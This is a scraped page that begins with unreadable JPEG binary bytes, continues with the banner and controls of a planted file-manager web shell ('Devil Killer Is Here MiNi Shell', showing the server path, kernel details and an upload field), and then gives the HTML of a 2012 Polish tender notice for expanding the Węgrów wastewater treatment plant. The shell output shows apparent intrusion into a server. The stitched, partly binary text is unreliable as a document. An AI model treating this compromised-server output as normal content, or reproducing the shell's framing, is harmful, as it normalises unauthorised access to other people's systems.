JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120130/28192-N-2012.html

<p class="kh_header"><b>Węgrów: Rozbudowa oczyszczalni ścieków w Węgrowie - zad. 1 Etap II,
realizowana w ramach projektu pn.: Rozbudowa oczyszczalni ścieków, budowa i rozbudowa sieci kanalizacyjnej w Węgrowie i gminie Liw</b><br>
<b>Numer ogłoszenia: 28192 - 2012; data zamieszczenia: 30.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Wodociągów i Kanalizacji Sp. z o.o. , ul. K. Szamoty 42b, 07-100 Węgrów, woj. mazowieckie, tel. 025 7923024, faks 025 7920051.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwikwegrow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: sektor wodno - kanalizacyjny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa oczyszczalni ścieków w Węgrowie - zad. 1 Etap II,
realizowana w ramach projektu pn.: Rozbudowa oczyszczalni ścieków, budowa i rozbudowa sieci kanalizacyjnej w Węgrowie i gminie Liw.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest Rozbudowa oczyszczalni ścieków w Węgrowie - zad. 1 Etap II, realizowana w ramach projektu pn.: Rozbudowa oczyszczalni ścieków, budowa i rozbudowa sieci kanalizacyjnej w Węgrowie i gminie Liw, w tym:
Przewiduje się następujące prace do wykonania w poszczególnych obiektach oczyszczalni ścieków:

Obiekty istniejące: 
1.  Pompownia główna z kratą, pompownia osadu  (istn.) - OB.1  - zainstalowanie ciągłego pomiaru poziomu ścieków i przebudowy układu sterowania (nowa 
rozdzielnia) 
-  roboty elektryczne z AKP 
2.  Piaskownik wirowy wyposażony w mechaniczny separator piasku OB.17 - obiekt istniejący, nie podlega rozbudowie; rozbudowie podlega przewód odpływu z 
piaskownika 
-  roboty instalacyjne 
3.  OKF ( adaptacja istn. Osadnika Imhoffa) - OB.4 - adaptacja istn. osadnika Imhoffa ze zmianą funkcji oraz remontem ogólnobudowlanym obiektu  
-  roboty rozbiórkowe i wyburzeniowe, przygotowanie zbiorników do prac rozbiorowych i demontażowych 
-  roboty ziemne dla rurociągów i terenu skarpy 
-  roboty drogowe na skarpie 
-  roboty elektryczne 
-  roboty instalacyjne 
-  montaż urządzeń technologicznych 
-  prace remontowe  
 4.  Poletka do suszenia osadów (istn), obejmuje tylko jedno poletko - ob.5 - remont poletka 
-  roboty rozbiórkowe  
-  roboty ziemne 
-  roboty budowlane
5.  Komory wstępnego podczyszczania, z pompowniami ścieków (istn.) - ob.8 modernizacja obiektu ze zmianą funkcji i remontem ogólnobudowlanym obiektu 
-  roboty budowlane związane z naprawą konstrukcji  
-  roboty rozbiórkowe i wyburzeniowe 
-  przygotowanie zbiorników do prac związanych z rozbudową 
-  roboty elektryczne 
-  roboty instalacyjne 
-  montaż urządzeń technologicznych 
-  montaż gotowych konstrukcji - montaż  pomostów 
 6.  Osadniki wtórne (istn.) - ob.9.1 i 9.2. - wymiana urządzeń technologicznych, podwyższenie ścian oraz remont ogólnobudowlany obiektu 
-  przygotowanie zbiorników do prac związanych z rozbudową  
-  roboty budowlane związane z naprawą konstrukcji 
-  roboty rozbiórkowe i wyburzeniowe dla osadników 
-  demontaż istniejącego wyposażenia 
-  roboty elektryczne 
-  roboty instalacyjne 
-  montaż urządzeń technologicznych  
 7.  Komora denitryfikacji (istn.)  - ob.18m - zainstalowanie dopływu ścieków,  remont istniejących pomostów 
-  roboty instalacyjne 
-   roboty malarskie
8.  Komora nitryfikacji (istn.) - ob.19m -  wymiana wyposażenia i instalacji napowietrzania, remont ogólnobudowlany obiektu, 
-  przygotowanie zbiorników do prac związanych z rozbudową  
-  ewentualne roboty malarskie pomostów 
-  demontaż istniejącego wyposażenia 
-  roboty instalacyjne 
-  montaż urządzeń technologicznych  
 9.  Poletko do suszenia piasku pod piaskownikiem (istn.) - ob.20 r - wymagany remont poletka 
-  roboty rozbiórkowe i wyburzeniowe 
-  roboty budowlane 
-  roboty ziemne 
 10. Przepompowania osadu + budynek dmuchaw (istn.) - ob.21 m - montaż rozdzielnic elektrycznych i izolacja (wygłuszenie) obiektu 
-  roboty budowlano-konstrukcyjne 
-  roboty izolacyjne  
-  roboty elektryczne 
-  roboty instalacyjne 
-  montaż urządzeń technologicznych  
11. Pompownia osadu wyflotowanego (istn.) - ob.23 - adaptacja na zbiornik osadu wyflotowanego  
-  przygotowanie zbiorników do prac związanych z rozbudową  
-  roboty budowlane (remont obiektu) 
-  roboty instalacyjne 
-  roboty rozbiórkowe  
 12. Zlewnia ścieków (istn.) - ob.27 m - wykonanie instalacji usuwania odorów 
-  Roboty instalacyjne 
-  Roboty elektryczne 
 13. Komora rozdziału ścieków (istn.) - ob.28 - wymiana urządzeń technologicznych, podwyższenie ścian oraz remont ogólnobudowlany obiektu 
-  przygotowanie zbiornika do prac związanych z rozbudową  
-  Roboty budowlane 
-  Roboty instalacyjne 
-  roboty rozbiórkowe  
 14. Komora zbiorcza osadów (istn) - ob.29 - podwyższenie ścian oraz remont ogólnobudowlany obiektu 
-  przygotowanie zbiornika do prac związanych z rozbudową  
-  Roboty budowlane 
-  Roboty instalacyjne 
-  roboty rozbiórkowe 
-  montaż gotowych konstrukcji (przykrycie)  
15. Studzienki zbiorcze (istn.) - ob.30.1 m, ob.30.2 m - przystosowanie do pobierania ścieku oczyszczonego  oraz remont ogólnobudowlany obiektu 
-  przygotowanie zbiorników do prac związanych z rozbudową  
-  Roboty budowlane 
-  Roboty instalacyjne 
-  roboty rozbiórkowe (wyburzeniowe)

Projektowane nowe obiekty: 
 16. Komory zasuw - ob.41.1n, ob.41.2.n -  wykonanie komór , montaż armatury 
-  roboty budowlane 
-  roboty ziemne pod obiekty 
-  roboty instalacyjne 
 
17. Pompowania osadu nadmiernego - ob.42n -  wykonanie budynku , montaż pompy i osprzętu 
-  Roboty budowlane z ziemnymi 
-  Roboty instalacyjne 
-  Roboty elektryczne 
-  Montaż wyposażenia technologicznego 
 18. Wiata dmuchaw - ob.43 n - wykonanie wiaty ze ścianami wygłuszającymi, montaż dmuchaw i rozdzielnic, montaż instalacji dozowania kwasu mrówkowego 
-  Roboty budowlane 
-  Roboty instalacyjne 
-  Roboty elektryczne 
-  montaż urządzeń technologicznych  
 19. Pompownia ścieku oczyszczonego - ob.44 oraz komora zasuw ob.KZp - wykonanie studni systemowych, montaż pompy, armatury, orurowania i osprzętu 
-  Roboty związane z osadzeniem studni, 
-  Roboty instalacyjne 
-  Roboty elektryczne 
-  roboty ziemne pod obiekty 
-  montaż urządzeń technologicznych  
 20. Zbiorniki osadu nadmiernego, zagęszczonego, przefermentowanego  - obiekt scalony 
- ob.45, 46,47  - wykonane żelbetowych zbiorników, instalacja urządzeń 
technologicznych, montaż przekrycia  
-  Roboty budowlano - konstrukcyjne 
-  Roboty instalacyjne 
-  Roboty elektryczne 
-  roboty ziemne 
-  montaż urządzeń technologicznych  
21. Budynek gospodarki osadowej (Budynek odwadniania osadu) - ob.48n wykonanie budynku z wiatą łącznie z urządzeniami i instancjami technologicznymi i ogólnymi 
-  Roboty budowlano - konstrukcyjne  
-  Roboty instalacyjne 
-  Roboty elektryczne 
-  Montaż instalacji monitoringu 
-  montaż urządzeń technologicznych  
owe urządzenia wolnostojące na terenie, posiadające numeracje jak obiekty: 
22. Silos wapna dla higienizacji osadu - ob.49 n - wykonanie płyty fundamentowej, montaż silosu i urządzeń towarzyszących 
-  Roboty budowlane 
-  Roboty elektryczne 
-  montaż urządzeń technologicznych  
23. Neutralizator odorów dla budynku gospodarki osadowej - ob.50 - wykonanie płyty fundamentowej, montaż biofiltru  
-  Roboty budowlane 
-  Roboty elektryczne 
-  montaż urządzeń technologicznych  
 24. Neutralizator odorów dla budynku punktu zlewnego ścieków - ob.51 wykonanie płyty fundamentowej, montaż biofiltru  
-  Roboty budowlane 
-  Roboty elektryczne 
-  montaż urządzeń technologicznych  
 25. Stacja poboru próbek - automatyczna- ob.52 - montaż stacji 
-  Roboty elektryczne 
-  montaż urządzeń technologicznych  

26. Przepływomierz końcowy- ob.53 n - zamontowanie przepływomierza do zabudowy w ziemi na istniejącym rurociągu podziemnym 
-  roboty ziemne 
-  roboty elektryczne 
-  roboty instalacyjne 
-  montaż urządzeń technologicznych  
 27. Nowa Brama automatyczna- ob.54 n - zamontowanie bramy wjazdowej oraz zainstalowanie monitoringu 
-  Roboty budowlane 
-  Roboty elektryczne 
-  montaż urządzeń  
28. Sieci zewnętrzne na terenie - sieci technologiczne podziemne i napowietrzne, sieci sanitarne kable energetyczne zasilające i sterujące , oświetlenie terenu 
-  Roboty budowlane 
-  Roboty instalacyjne 
-  Roboty elektryczne 
29. Obiekty istniejące przeznaczone do wyburzeń + uporządkowanie i niwelacja terenu: 
-  Kanały dopływowe do poletek - część istniejącego kanału 
-  Kanały dopływowe do osadników wstępnych 
-  Kanały i komora przed Imhoffem

Zakres przedmiotu zamówienia obejmuje także m.in. rozruch oczyszczalni ścieków potwierdzony uzyskaniem efektu ekologicznego oraz wykonanie wszelkich robót towarzyszących i tymczasowych niezbędnych do wykonania przedmiotu umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, polegających na budowie zadaszenia poletek osadowych.
Orientacyjna powierzchnia poletek osadowych przewidziana do zadaszenia: 85 m x 32 m.
Zamawiający przewiduje udzielenie zamówień uzupełniających do wartości 20% wartości zamówienia podstawowego.
Szczegółowe rozwiązania techniczne uwzględniać będzie projekt budowlany. Jeżeli Zamawiający podejmie decyzje o wykonaniu budowli, wówczas zostanie zlecone opracowanie dokumentacji projektowej oraz konieczne będzie uzyskanie stosownego pozwolenia na budowę. Po spełnieniu wszystkich wymagań formalnych oraz zabezpieczeniu środków finansowych na ten cel, zostanie udzielone zamówienie uzupełniające.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.25.21.00-9, 45.25.21.27-4, 45.11.12.00-0, 45.26.00.00-7, 45.34.20.00-6, 45.45.30.00-7, 45.42.11.30-4, 45.44.30.00-4, 45.11.00.00-1, 45.23.24.40-8, 45.23.20.00-2, 45.32.00.00-6, 45.33.00.00-9, 45.33.12.00-8, 45.33.12.10-1, 45.25.22.00-0, 45.23.10.00-5, 45.31.00.00-3, 45.31.22.00-9, 45.31.42.00-3, 45.31.43.20-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 15.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości 300 000,00 PLN (słownie: trzysta tysięcy zł)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony przez Wykonawcę, jeżeli wykaże on, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej:
a)	2 roboty polegające na budowie nowego, przebudowie lub rozbudowie istniejącego obiektu oczyszczalni ścieków o RLM>25 000 każda. Wykonawca wykaże, że co najmniej jedna robota prowadzona była na czynnym obiekcie oczyszczalni ścieków i co najmniej jedna robota prowadzona była na obiekcie oczyszczalni z udziałem ścieków mleczarskich.
Za wykonaną robotę należy rozumieć robotę, dla której wszelkie prace zostały zakończone i wystawiono Świadectwo Przejęcia/Protokół Odbioru końcowego robót.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie odpowiednim sprzętem niezbędnym do wykonania zamówienia, określonym poniżej:
a)	przewoźne urządzenie(a) do odwadniania osadów umożliwiające odwodnienie osadu w ilości wynikającej z projektu, ze wskazaniem parametrów technicznych urządzenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie osobami, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, określonymi poniżej:
a)	Kierownik budowy, posiadający:
-	co najmniej 5 lat doświadczenia zawodowego, w tym co najmniej 3 lata doświadczenia na stanowisku kierownika budowy przy kontraktach infrastrukturalnych z zakresu gospodarki wodno - ściekowej, w tym kierowanie co najmniej dwoma zakończonymi inwestycjami obejmującymi swym zakresem budowę nowego, przebudowę lub rozbudowę czynnego obiektu oczyszczalni ścieków o RLM>25 000 każda;
Zamawiający wymaga, aby kierowanie jednej z inwestycji odbywało się na czynnym obiekcie oczyszczalni ścieków.
Przez zakończoną inwestycję należy rozumieć kontrakt (zawarty w ramach jednej umowy), w którym wszelkie roboty zostały zakończone i wystawiono Świadectwo Przejęcia/Protokół Odbioru końcowego robót.
-	uprawnienia budowlane w specjalności konstrukcyjno - budowlanej bez ograniczeń lub instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń wydane na podstawie obecnie obowiązujących przepisów prawa lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub uprawnienia według przepisów kraju ich uzyskania, uprawniające do pełnienia funkcji kierownika budowy dla robót konstrukcyjno - budowlanych lub sanitarnych objętych niniejszym zamówieniem,
b)	Kierownik robót branży sanitarnej, posiadający:
-	co najmniej 5 lat doświadczenia zawodowego, w tym co najmniej 3 lata doświadczenia na stanowisku kierownika budowy lub  kierownika robót przy kontraktach infrastrukturalnych z zakresu gospodarki wodno - ściekowej, w tym kierowanie robotami branży sanitarnej w co najmniej dwóch zakończonych inwestycjach obejmujących swym zakresem budowę nowego, przebudowę lub rozbudowę czynnego obiektu oczyszczalni ścieków 
o RLM>25 000 każda;
Zamawiający wymaga, aby kierowanie robotami dla jednej z inwestycji odbywało się na czynnym obiekcie oczyszczalni ścieków.
Przez zakończoną inwestycję należy rozumieć kontrakt (zawarty w ramach jednej umowy), w którym wszelkie roboty zostały zakończone i wystawiono Świadectwo Przejęcia/Protokół Odbioru końcowego robót.
-	uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń wydane na podstawie obecnie obowiązujących przepisów prawa lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub uprawnienia według przepisów kraju ich uzyskania, uprawniające do pełnienia funkcji kierownika budowy dla robót sanitarnych objętych niniejszym zamówieniem,
c)	Technolog oczyszczalni ścieków, posiadający:
-	co najmniej 5 lat doświadczenia w zakresie prac związanych z technologią oczyszczania ścieków z uwzględnieniem gospodarki osadowej, w tym doświadczenie w kierowaniu lub nadzorowaniu co najmniej dwoma rozruchami mechaniczno - biologicznymi oczyszczalni ścieków o RLM>25 000 każda.
-	Zamawiający wymaga, aby co najmniej jeden rozruch mechaniczno - biologiczny dotyczył obiektu oczyszczalni z udziałem ścieków mleczarskich.
d)	Kierownik robót branży konstrukcyjno - budowlanej, posiadający:
-	co najmniej 5 lat doświadczenia zawodowego, w tym co najmniej 3 lata doświadczenia na stanowisku kierownika budowy lub kierownika robót przy realizacji obiektów kubaturowych z zakresu gospodarki wodno - ściekowej, w tym kierowanie robotami branży konstrukcyjno-budowlanej w co najmniej dwóch zakończonych inwestycjach obejmujących swym zakresem budowę nowych, przebudowę lub rozbudowę czynnych obiektów kubaturowych oczyszczalni ścieków.
Zamawiający wymaga, aby kierowanie robotami dla  jednej z inwestycji odbywało się na czynnym obiekcie oczyszczalni ścieków.
Przez zakończoną inwestycję należy rozumieć kontrakt (zawarty w ramach jednej umowy), w którym wszelkie roboty zostały zakończone i wystawiono Świadectwo Przejęcia/Protokół Odbioru końcowego robót.
-	uprawnienia budowlane w specjalności konstrukcyjno - budowlanej bez ograniczeń wydane na podstawie obecnie obowiązujących przepisów prawa lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub uprawnienia według przepisów kraju ich uzyskania, uprawniające do pełnienia funkcji kierownika robót dla robót konstrukcyjno - budowlanych objętych niniejszym zamówieniem,
e)	Kierownik robót branży elektrycznej, posiadający:
-	co najmniej 5 lat doświadczenia zawodowego, w tym co najmniej 3 lata doświadczenia na stanowisku kierownika robót przy robotach dotyczących wykonania sieci elektroenergetycznych oraz automatyki w budownictwie z zakresu gospodarki wodno - ściekowej.
-	uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń wydane na podstawie obecnie obowiązujących przepisów prawa lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub uprawnienia według przepisów kraju ich uzyskania, uprawniające do pełnienia funkcji kierownika robót dla robót elektrycznych objętych niniejszym zamówieniem.
Zamawiający dopuszcza pełnienie funkcji:
- Kierownika budowy oraz Kierownika robót branży sanitarnej lub
- Kierownika budowy  oraz Kierownika robót branży konstrukcyjno - budowlanej 
przez jedna osobę, pod warunkiem spełnienia przez ta osobę wymagań dla obu łączonych funkcji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony przez Wykonawcę, jeżeli wykaże on, że:
a)	posiada środki finansowe lub zdolność kredytową w wysokości co najmniej 2 800 000 PLN;
b)	posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności w wysokości co najmniej 2 800 000 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

